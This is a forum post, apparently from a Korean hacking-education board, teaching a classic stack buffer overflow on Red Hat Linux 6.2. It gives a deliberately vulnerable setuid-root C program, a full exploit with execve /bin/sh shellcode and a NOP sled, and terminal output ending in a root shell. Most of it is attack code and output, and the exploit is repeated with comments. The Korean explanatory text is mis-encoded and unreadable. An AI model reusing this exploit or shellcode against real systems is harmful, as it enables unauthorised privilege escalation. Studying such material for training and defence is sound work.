http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1437 [º¹»ç]
À̹ø°Á´ º°·Î ¶æÀº ¾ø½À´Ï´Ù.
´©±¸µçÁö 1ºÐ¸¸ »ý°¢Çϸé ©¼öÀÖ´Â ÀͽºÇ÷ÎÀÕÀÔ´Ï´Ù .
Á¦°¡ ÀÚÀ¯°Á½ǿ¡ ¿Ã¸®´Â ÀÌÀ¯´Â .. !
'º°ºûÀ»´ã¾Æ'´ÔÀÇ °Á¸¦ °ßÁ¦Çϱâ À§Çؼ .. !!!! ÀÔ´Ï´Ù .¤»¤»¤»¤»
Àü¿¡ Á¦ Ƽ½ºÅ丮¿¡ ¿Ã·È¾úÁö¸¸ À߸øµÈÁ¡ÀÌ ÀÖ¾î ¼öÁ¤ÇÑ°ÍÀ» ´Ù½Ã ¿Ã¸³´Ï´Ù .!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0smp on an i686
login: buff3r
Password:
Last login: Sat Mar 6 19:26:44 from 192.168.0.3
[buff3r@testserver buff3r]$ ls -al
total 36
drwx------ 3 buff3r buff3r 4096 Mar 6 19:13 .
drwxr-xr-x 7 root root 4096 Mar 6 18:54 ..
-rw------- 1 buff3r buff3r 1239 Mar 6 19:30 .bash_history
-rw-r--r-- 1 buff3r buff3r 24 Mar 6 18:54 .bash_logout
-rw-r--r-- 1 buff3r buff3r 230 Mar 6 18:54 .bash_profile
-rw-r--r-- 1 buff3r buff3r 124 Mar 6 18:54 .bashrc
-rwxr-xr-x 1 buff3r buff3r 333 Mar 6 18:54 .emacs
-rw-r--r-- 1 buff3r buff3r 3394 Mar 6 18:54 .screenrc
drwxrwxr-x 2 buff3r buff3r 4096 Mar 6 19:30 exploits
[buff3r@testserver buff3r]$ cd exploits/
[buff3r@testserver exploits]$ ls -al
total 28
drwxrwxr-x 2 buff3r buff3r 4096 Mar 6 19:30 .
drwx------ 3 buff3r buff3r 4096 Mar 6 19:13 ..
-rw-rw-r-- 1 buff3r buff3r 852 Mar 6 19:27 exploit.c
-rwsr-xr-x 1 root root 11750 Mar 6 19:14 vuln
-rw-r--r-- 1 root root 109 Mar 6 19:14 vuln.c
[buff3r@testserver exploits]$ cat vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500];
strcpy(buffer,argv[1]);
return ;
}
[buff3r@testserver exploits]$ cat exploit.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
ret = 0; // ¿ì¸®´Â ¾ÆÁ÷ ret ÀÇ °ªÀ» ¸ð¸¨´Ï´Ù.
buffer = malloc(600);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
buffer[600-1] = 0;
execl("./vuln", "vuln", buffer, 0);
free(buffer);
return 0;
}
[buff3r@testserver exploits]$ cp vuln buff
[buff3r@testserver exploits]$ ltrace ./buff `perl -e 'print "\x41"x600'`
__libc_start_main(0x080483d0, 2, 0xbffff944, 0x08048298, 0x0804842c <unfinished ...>
__register_frame_info(0x0804945c, 0x08049530, 0xbffff904, 0x080482bd, 0x401081ec) = 0x40108d40
strcpy(0xbffff704, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff704
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[buff3r@testserver exploits]$ vi exploit.c
[buff3r@testserver exploits]$ gcc exploit.c -o exploit
[buff3r@testserver exploits]$ /bin/bash2
[buff3r@testserver exploits]$ ./exploit
bash# id
uid=0(root) gid=501(buff3r) groups=501(buff3r)
·çÆ® ±ÇÇÑÀ» ¾ò¾î³¾¼öÀÖ´Ù .
Áß¿äºÎºÐ¸¸ º¸µµ·Ï ÇÏÀÚ
vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500]; // 500Å©±âÀÇ ¹öÆÛ¸¦ ¼±¾ðÇÑ´Ù
// Stack Status : [BUFFER (500byte)][SFP (4btye)[RET (4byte)]
strcpy(buffer,argv[1]);
return ;
}
exploit.c
¿ø·¡ get_esp °°Àº ÀζóÀÎ ¾î¼Àºí¸® ÇÔ¼ö¸¦ ¼±¾ðÇÑÈÄ ¿ÀÇÁ¼ÂÀ» Âï¾îº¸´Â°ÍÀÌ ÀϹÝÀûÀÎ °ø°Ü¹ýÀÌÁö¸¸ redhat 6.2 ¿¡¼´Â random stackÀÌ Àû¿ëÀÌ ¾ÈµÇ¹Ç·Î ±×³É Á¤È®ÇÑ ÁÖ¼Ò°ªÀ» ¾ò¾î³¾¼öÀÖÀ¸¹Ç·Î offsetÀÌ ÇÊ¿ä¾ø´Ù.
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
ret = 0xbffff704; // ¾Æ±î ltrace ¸¦ ÅëÇØ strcpy °¡ ¾î¶² À§Ä¡¿¡ argv[1]À» º¹»çÇÏ´ÂÁö
// ¾Ë¾Æ³Â´Ù ±× °ªÀ» ÀÌ¿ëÇÏÀÚ
buffer = malloc(600); // °ø°Ý½ºÅÃÀ» ±¸¼ºÇϱâ À§ÇÑ ÇÒ´ç
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; } // óÀ½ 600 ¹ÙÀÌÆ®¸¦ ¸ðµÎ ret·Î ä¿î´Ù (0xbffff704)
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; } // óÀ½ 200 ¹ÙÀÌÆ®¸¦ ¸ðµÎ NOPÀ¸·Î ä¿î´Ù.
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; } // óÀ½ + 200 ºÎÅÍ ½©Äڵ带 ³öµÐ´Ù.(NOPµÚ¿¡³öµÐ´Ù.)
buffer[600-1] = 0; // ¸Ç³¡À» 0À¸·Î ³¡³½´Ù
execl("./vuln", "vuln", buffer, 0); // ¿ì¸®°¡ ¸¸µç °ø°Ý ¹öÆÛ¸¦ vuln ÀÇ ÀÎÀÚ·Î
// ÁÖ°í vuln À» ½ÇÇàÇÑ´Ù.
free(buffer);
return 0;
}
|
Hit : 14196 Date : 2010/03/17 07:51
|